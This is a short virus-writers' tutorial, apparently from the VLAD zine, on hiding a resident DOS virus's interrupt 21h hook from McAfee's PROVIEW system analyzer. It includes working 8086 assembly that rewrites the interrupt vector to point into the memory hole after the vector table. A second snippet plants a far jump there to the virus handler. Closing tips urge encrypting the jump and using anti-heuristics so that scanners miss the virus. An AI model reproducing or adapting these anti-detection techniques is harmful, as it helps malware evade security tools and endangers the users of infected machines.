T R I C K I N G P R O V I E W
Written by
Darkman/VLAD
------------
Introduction
------------
This document is an example of how to trick PROVIEW, by changing the
address of interrupt 21h and point it to the hole in the memory, after the
interrupt table. In the memory hole we create a jump to the virus code and
the virus code will return to the original interrupt 21h.
-----------
Information
-----------
Analysing the interrupt vectors with PROVIEW, would usually look something
like this:
No T Interrupt Name Address Points to
21 û DOS Function call 0021:40F8 DOS CODE
When a virus is resident, the analysis of the interrupt vectors with
PROVIEW, will usual look something like this:
No T Interrupt Name Address Points to
21 û DOS Function call 9FC8:0062 !!! Unknown !!!
When a virus, which tricks PROVIEW, is resident, the analysis of the
interrupt vectors with PROVIEW, will look like this:
No T Interrupt Name Address Points to
21 û DOS Function call 001E:0000 Interrupt Vector Table
-------------------------------
McAfee Associates about PROVIEW
-------------------------------
PROVIEW (tm) Integrated System Analyzer and Viewer
Copyright (C) 1992 - 1993 by McAfee Associates
All rights reserved
PROVIEW is a menu driven program used to analyze, view
and edit the basic components of a system, including the
system memory, system interrupts, device drivers, and
installed disk drive sectors and file contents. PROVIEW
will allow you to view system elements in HEX, ASCII or
disassembled code format. Full searching and editing
functions are included.
Interrupts
View/Edit the System Interrupt Vectors. Proview
indicates which ones are currently in use, their
memory addresses, owners and interrupt chains.
You may display/edit the actual interrupt code in
hex or ASM format.
--------------------
How to trick PROVIEW
--------------------
The below steps must be followed to trick PROVIEW:
1. Load and store address of interrupt 21h.
2. Create a jump far in the memory hole.
---------------------------------------
Load and store address of interrupt 21h
---------------------------------------
The below code shows a example of how to load and store the address of
interrupt 21h:
;------------------------------------------------------------=< cut here >=-
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt table
xchg ax,ds:[21h*04h] ; Load and store offset of INT 21h
mov es:[int21off],ax ; Store offset of INT 21h
mov ax,1eh ; AX = segment of hole in memory
xchg ax,ds:[21h*04h+02h] ; Load and store segment of INT 21h
mov es:[int21seg],ax ; Store segment of INT 21h
;------------------------------------------------------------=< cut here >=-
This code presumes that two variables of a word called int21off and
int21seg exists.
------------------------------------
Create a jump far in the memory hole
------------------------------------
The below code shows a example of how to create a jump far in the
memory hole:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[1e0h],0eah
mov word ptr ds:[1e1h],offset virusint21
mov ds:[1e3h],es ; Store segment of virusint21
;------------------------------------------------------------=< cut here >=-
This code presumes that a procedure called virusint21 exists.
----------------------------------------------------
Necessary labels, variables and code to the examples
----------------------------------------------------
The above examples presumes that two variables of a word called int21off
and int21seg exists. These variables holds the address of the original
interrupt 21h.
The above examples presumes that a procedure called virusint21 exists. This
procedure is interrupt 21h of the virus.
---------------------
Final tips and tricks
---------------------
- Encrypt the jump far in the memory hole, then PROVIEW can't disassemble
it.
- Use a lot anti-heuristic's, so other programs can't find the virus either.
- Remember to optimize your code.
- VLAD #3 INDEX -